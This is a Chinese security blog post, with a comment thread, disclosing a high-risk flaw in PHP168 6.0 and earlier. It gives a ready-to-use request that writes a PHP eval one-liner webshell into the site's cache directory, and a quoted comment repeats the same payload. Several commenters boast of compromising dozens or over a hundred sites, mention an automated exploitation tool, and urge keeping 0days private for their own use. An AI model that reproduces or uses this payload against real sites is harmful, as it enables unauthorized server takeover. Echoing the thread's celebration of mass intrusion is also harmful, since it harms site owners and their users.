PHP168 6.0及以下版本漏洞

# 鬼仔:未测试。最近比较忙,所以很多东西都更新不及时,也有好多没贴上来,抱歉,这几天整理下,把积攒的都更新了。

来源:chinesehonker

危险等级:高

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?

相关日志

楼被抢了 20 层了... 抢座Rss 2.0或者 Trackback

  • 电脑报陈邓新

    阿鬼,你爆出这个,真的是哎!我好不容易求到的,本来准备这期上,结果版面的原因,要半个月后上。我的选题呀,55555555555555555!

    • 鬼仔

      这个两天就有人发了
      而且马俊那里有篇8月份发的加密日志就是这个,昨天马俊把那个加密日志密码发了出来
      那篇加密日志的地址在这里
      内容:

      php168的0day
      惘然兄弟给的
      拿了个xx的0day和他换的 呵呵
      公布出来吧
      如果你有这个命看到
      login.php

      login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=

      写到:cache/shell.php ,

      暂时不做漏洞分析

  • 电脑报陈邓新

    这个漏洞出来好几个月了,得到它们不容易呀!5555555,下下周的稿子,我也要改改说法,全都弄好了,5555555555.哎!!

  • 电脑报陈邓新

    还好,这个东东还是可以说,流传的范围不会很广,我们要文章中点明时间。

  • YoCo Smart

    鬼哥,我跟你说的那个编辑,就是楼上那个……
    他说他搞到四个了,不过我的一个朋友说他搞死了一片了,汗颜

  • haok

    我已经搞了一百多了

  • evil86

    这个是flyh4t发现的 马军这个鸡巴整天偷东西

  • 惘然

    这个没什么大用,我都没拿它来打站..朋友写了个利用工具。。全自动的 不知道被我丢哪了。。

    漏洞是我追一个V6版本漏洞时,当时我知道朋友手里有,都不方便给我,后来找了几个被日过的PHP168程序 追到的。。。

    PHP168还有很多个没被公布出来的洞。。。

  • sky

    这个漏洞已经被php168官方修补了:
    http://bbs.php168.com/read-bbs-tid-263585.html

  • sExYboy

    貌似很久没文章了..搞篇科普嘛

  • 电脑报陈邓新

    是flyh4t发现?不是深灰色?

  • 坏人咖啡

    这个漏洞很早了,早就在流传了!

  • Inet.sec

    鬼仔哥,你好,好久没来了,你还是那么的勤快
    我已经做好鬼仔哥的链接,希望鬼仔哥给个链接
    Inet.sec ‘Sblog http://hi.baidu.com/inetsec

    谢谢
    by INet.sec

  • GFS

    现在漏洞被填补了.

  • 骨头

    不玩PHP168

  • 和尚

    楼上全是大牛 ··

  • xx

    手上有0day的哥们别再公布出来了 OK不?自己留着用得了

  • 1

    厉害 我来学习下

  • Ech0

    哈哈` `楼上都大牛

    唉0day还是不要公布好“

    不然受害者一大把哦`

发表评论